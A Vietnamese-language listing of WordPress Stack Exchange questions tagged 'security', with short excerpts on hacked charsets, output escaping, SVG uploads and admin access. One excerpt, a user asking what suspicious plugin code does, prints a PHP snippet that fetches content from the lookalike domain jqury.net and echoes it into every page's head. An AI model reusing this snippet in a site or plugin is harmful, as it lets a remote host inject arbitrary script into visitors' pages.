Câu hỏi được gắn thẻ «security»

Đã đóng cửa. Câu hỏi này không đúng chủ đề . Nó hiện không chấp nhận câu trả lời. Bạn muốn cải thiện câu hỏi này? Cập nhật câu hỏi để nó thuộc chủ đề cho Trao đổi ngăn xếp phát triển WordPress. Đóng cửa 4 năm trước . Tôi …

20 login  security 

Tôi đã có một khách hàng bị hack gần đây và tôi nhận thấy rằng có những nhân vật kỳ lạ xuất hiện trên trang web của cô ấy, như Â và. Hóa ra các tin tặc đã thay đổi blog_charset thành UTF-7 trong wp_optionsbảng trong cơ sở dữ liệu. …

19 security  encoding  hacked  characters 

Tôi mới dùng WordPress. Gần đây tôi đã đọc một bài viết về cách tin tặc có thể khai thác lỗ hổng trong plugin. Nhiều nguồn khác nhau như Google Pagespeed cũng không cho phép tôi sử dụng plugin hoặc ít nhất là giữ nó ở mức tối thiểu. Cá …

19 plugins  security 

Tôi hiện đang phát triển một plugin và nhiều khả năng tôi sẽ phát hành nó nhiều hơn trên kho plugin công cộng để những người khác có thể sử dụng nó. Plugin sẽ sử dụng API và để sử dụng API này, bạn cần phải nhập tên người dùng …

19 plugin-development  security  api  encryption 

Tôi tìm thấy điều này trong một plugin. Nó làm gì? có nguy hiểm không add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Tôi muốn đảm bảo tất cả dữ liệu trong các plugin / chủ đề của tôi được xử lý an toàn trước khi vào cơ sở dữ liệu và trước khi được xuất ra trình duyệt. Vấn đề của tôi là có những tình huống API xử lý việc khử …

17 plugin-development  security  customization  validation  sanitization 

Là giữ wp-admin/install.phpvà wp-admin/install-helper.phprò rỉ bảo mật trên các phiên bản mới hơn của wordpress? Theo mặc định, quyền trên các tệp đó là 644. Nếu có bất kỳ rò rỉ, những loại xin vui lòng?

16 security  installation 

Vì hiện tại, câu hỏi này không phù hợp với định dạng Hỏi & Đáp của chúng tôi. Chúng tôi hy vọng câu trả lời sẽ được hỗ trợ bởi các sự kiện, tài liệu tham khảo hoặc chuyên môn, nhưng câu hỏi này có thể sẽ thu hút tranh …

16 plugins  plugin-development  security  sql 

Tôi thấy rằng các SVG bị chặn theo mặc định trong trình tải lên phương tiện và bạn phải thêm nó dưới dạng loại MIME được hỗ trợ trong hàm.php. Những lý do bảo mật đằng sau này?

15 media  security  svg 

Tôi đã xem mã nhưng tôi không thể thấy bất kỳ lối thoát nào trên các chức năng như the_title the_content the_excerptv.v. Tôi có thể không đọc đúng. Tôi có cần thoát khỏi các chức năng này trong phát triển chủ đề như: esc_html ( the_title () ) Chỉnh sửa: …

15 security  escaping 

Chúng tôi đang có một số vấn đề với một nhà phát triển bên ngoài. Chúng tôi muốn giới hạn quyền truy cập vào wp-admintrang web chỉ truy cập nội bộ (thông qua VPN ). Đơn giản như vậy nó sẽ không bị tấn công bởi người dùng bên ngoài. …

14 admin  ajax  security 

Chỉ cần một câu hỏi nhanh có thể giúp bảo mật một chút. Tôi nhận thấy rằng tệp readme.html có số phiên bản được liệt kê. Nó xuất hiện lại sau mỗi lần nâng cấp và do đó, Licence.txt và wp-config-sample.php cũng vậy. Có cách nào dễ dàng để WordPress …

13 security  wp-config 

Cấu hình WordPress để cập nhật trong ứng dụng (tức là WordPress) là lý tưởng đối với tôi vì sự tiện lợi của nó. Tuy nhiên, tôi gặp rắc rối với các yêu cầu. Các trường được yêu cầu hiển thị sau khi cài đặt ssh2 cho php yêu cầu …

13 security  updates  ssh 

Nhìn vào Codex cho wp_insert_post (), nó nói rằng hàm này "... khử trùng các biến, thực hiện một số kiểm tra, điền vào các biến bị thiếu như ngày / giờ, v.v." (EDIT: Tôi đã cập nhật mục Codex để bao gồm một ví dụ mạnh mẽ hơn bao …

13 security  sanitization 

Điều này làm cho mã hóa của tôi khó khăn. Wordpress codex lý do việc sử dụng esc_url bằng cách nói mơ hồ về bảo mật. Nhưng nó có thực sự đáng giá? Ví dụ, lợi ích bảo mật thiết thực, quan trọng bằng cách sử dụng là gì <?php …

12 security